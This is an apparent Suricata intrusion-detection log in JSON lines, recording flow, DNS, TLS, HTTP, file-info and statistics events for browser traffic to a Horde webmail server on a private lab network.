{"timestamp":"2020-02-29T00:21:33.000372+0000","flow_id":1852138835688518,"event_type":"flow","src_ip":"192.168.10.122","src_port":50103,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:32.015430+0000","end":"2020-02-29T00:16:32.120707+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:36.986166+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7394},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36206,"tx_id":0}} {"timestamp":"2020-02-29T00:21:36.998071+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38791,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16560,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:21:37.000143+0000","event_type":"stats","stats":{"uptime":14949,"capture":{"kernel_packets":137612,"kernel_drops":0},"decoder":{"pkts":137625,"bytes":94299770,"invalid":193,"ipv4":136070,"ipv6":10,"ethernet":137625,"raw":0,"null":0,"sll":0,"tcp":130554,"udp":5308,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2847,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2863,"synack":2854,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2429,"failed_udp":114},"tx":{"http":4830,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2511}},"flow_mgr":{"closed_pruned":2825,"new_pruned":17,"est_pruned":2485,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19767,"memcap_state":0,"memcap_global":0},"http":{"memuse":70212,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:37.000381+0000","flow_id":996559891170365,"event_type":"flow","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1415,"bytes_toclient":6318,"start":"2020-02-29T00:20:31.623677+0000","end":"2020-02-29T00:20:36.894135+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:37.106785+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38791,"proto":"UDP","dns":{"type":"answer","id":16560,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:37.106785+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38791,"proto":"UDP","dns":{"type":"answer","id":16560,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:37.153346+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=zwiFi46-w1WbjcxymnmTfV7&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3344}} 
{"timestamp":"2020-02-29T00:21:38.000477+0000","flow_id":726707095974901,"event_type":"flow","src_ip":"192.168.10.130","src_port":34894,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":4,"bytes_toserver":338,"bytes_toclient":912,"start":"2020-02-29T00:20:31.832501+0000","end":"2020-02-29T00:20:37.027337+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"13","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:39.000350+0000","flow_id":2129426219671760,"event_type":"flow","src_ip":"192.168.10.122","src_port":39052,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:38.401616+0000","end":"2020-02-29T00:16:38.507038+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:42.154621+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=zwiFi46-w1WbjcxymnmTfV7&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3344},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":8575,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:44.000206+0000","event_type":"stats","stats":{"uptime":14956,"capture":{"kernel_packets":137630,"kernel_drops":0},"decoder":{"pkts":137636,"bytes":94304976,"invalid":193,"ipv4":136081,"ipv6":10,"ethernet":137636,"raw":0,"null":0,"sll":0,"tcp":130563,"udp":5310,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2847,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2863,"synack":2854,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2430,"failed_udp":114},"tx":{"http":4831,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2512}},"flow_mgr":{"closed_pruned":2827,"new_pruned":17,"est_pruned":2486,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19508,"memcap_state":0,"memcap_global":0},"http":{"memuse":880,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:44.207478+0000","flow_id":2145609676489439,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.130","src_port":34226,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.spiral.com","issuerdn":"CN=ChangeMe","fingerprint":"4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17","sni":"mail.spiral.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:24","notafter":"2030-02-25T18:40:24"}} {"timestamp":"2020-02-29T00:21:45.000312+0000","flow_id":446177012569860,"event_type":"flow","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1459,"bytes_toclient":6323,"start":"2020-02-29T00:20:39.153348+0000","end":"2020-02-29T00:20:44.442845+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:45.000639+0000","flow_id":1224712834032352,"event_type":"flow","src_ip":"192.168.10.122","src_port":33837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:44.041696+0000","end":"2020-02-29T00:16:44.146676+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:45.000742+0000","flow_id":1932166962086260,"event_type":"flow","src_ip":"192.168.10.122","src_port":39917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:44.262516+0000","end":"2020-02-29T00:16:44.370968+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:47.000606+0000","flow_id":1207103483610682,"event_type":"flow","src_ip":"192.168.10.130","src_port":34896,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1149,"bytes_toclient":8456,"start":"2020-02-29T00:20:41.460346+0000","end":"2020-02-29T00:20:46.736491+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:48.000454+0000","flow_id":1731686478885927,"event_type":"flow","src_ip":"192.168.10.122","src_port":53483,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:47.177191+0000","end":"2020-02-29T00:16:47.282104+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:50.000632+0000","flow_id":1781907531591448,"event_type":"flow","src_ip":"192.168.10.122","src_port":45792,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:49.880408+0000","end":"2020-02-29T00:16:49.985303+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:51.000375+0000","event_type":"stats","stats":{"uptime":14963,"capture":{"kernel_packets":138419,"kernel_drops":0},"decoder":{"pkts":138443,"bytes":94943524,"invalid":193,"ipv4":136886,"ipv6":10,"ethernet":138443,"raw":0,"null":0,"sll":0,"tcp":131368,"udp":5310,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2853,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2869,"synack":2860,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":767,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2430,"failed_udp":114},"tx":{"http":4831,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2512}},"flow_mgr":{"closed_pruned":2829,"new_pruned":17,"est_pruned":2489,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18186,"memcap_state":0,"memcap_global":0},"http":{"memuse":720,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:51.003841+0000","flow_id":1807681630395421,"event_type":"flow","src_ip":"192.168.10.122","src_port":57626,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:50.089117+0000","end":"2020-02-29T00:16:50.197597+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:51.889868+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33731,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9266,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:52.001579+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33731,"proto":"UDP","dns":{"type":"answer","id":9266,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:52.001579+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33731,"proto":"UDP","dns":{"type":"answer","id":9266,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:52.125095+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8987}} {"timestamp":"2020-02-29T00:21:52.169203+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8987},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":37371,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.174073+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:21:52.172534+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:21:52.182051+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.182282+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} 
{"timestamp":"2020-02-29T00:21:52.177953+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/form_sections.js","state":"CLOSED","stored":false,"size":1723,"tx_id":1}} {"timestamp":"2020-02-29T00:21:52.191682+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:52.178406+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:21:52.181046+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:21:52.190156+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":2}} {"timestamp":"2020-02-29T00:21:52.190323+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52952,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.237320+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689}} 
{"timestamp":"2020-02-29T00:21:52.237346+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973}} {"timestamp":"2020-02-29T00:21:52.237512+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:21:54.001526+0000","flow_id":2182554981492520,"event_type":"flow","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":13,"bytes_toserver":2320,"bytes_toclient":11098,"start":"2020-02-29T00:20:47.780072+0000","end":"2020-02-29T00:20:53.446700+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
